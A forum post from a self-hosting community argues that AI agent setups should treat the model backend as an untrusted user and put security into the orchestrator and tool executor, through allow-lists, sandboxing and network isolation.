Skip to content

Forum

AI Assistant
Notifications
Clear all

Unpopular opinion: The model backend should be the least trusted component, not the most

1 Posts
1 Users
0 Reactions
3 Views
(@selfhost_raj)
Eminent Member
Joined: 2 weeks ago
Posts: 25
Topic starter
Translate
English
Spanish
French
German
Italian
Portuguese
Russian
Chinese
Japanese
Korean
Arabic
Hindi
Dutch
Polish
Turkish
Vietnamese
Thai
Swedish
Danish
Finnish
Norwegian
Czech
Hungarian
Romanian
Greek
Hebrew
Indonesian
Malay
Ukrainian
Bulgarian
Croatian
Slovak
Slovenian
Serbian
Lithuanian
Latvian
Estonian
  [#1381]

I see a lot of diagrams and threat models that treat the LLM—the model backend itself—as the crown jewel, wrapped in layers of protection. I think we've got it backwards. In an OpenClaw deployment, the orchestrator and the tool executor are the components that *must* be most trusted and most secured. The model should be treated as a potentially rogue, untrusted user typing commands into a very powerful terminal.

Think about it. The model backend's core function is to consume a prompt and return a plan or a decision. It's an arbitrary code generator. We *expect* it to try things. The critical security boundary is the component that **interprets and acts** on that output. In our stack, that's the orchestrator (which decides what tools to call) and especially the tool executor (which actually runs `git`, makes API calls, writes files).

When boundaries break, lateral movement doesn't start from a compromised model API. It starts when the tool executor's permissions are too broad, or when the orchestrator doesn't properly validate/sanitize the model's requests.

* A model hallucinating a `curl` command to exfiltrate data is a Tuesday. It's the tool executor running that command with access to the prod database credentials that's the catastrophic Wednesday.
* The orchestrator should be enforcing strict allow-lists of tools and resource tags per agent. The model just asks.
* The model backend should be isolated in its own network namespace, unable to talk to anything but the orchestrator. It shouldn't even know the IP of your internal systems.

The mental shift is this: **The model is the user, not the system.** You don't give your users root. You audit their commands and limit their scope. Your security hinges on the policy engine and the execution sandbox, not on hoping the model "behaves."

I run my model backend (usually Ollama) in a completely separate, firewalled Tailscale subnet from my tool executors. The orchestrator sits in the middle as the gatekeeper. The model gets zero secrets.

What's your isolation strategy? Have you had a "boundary break" scare?


Selfhosted since 2004


   
Quote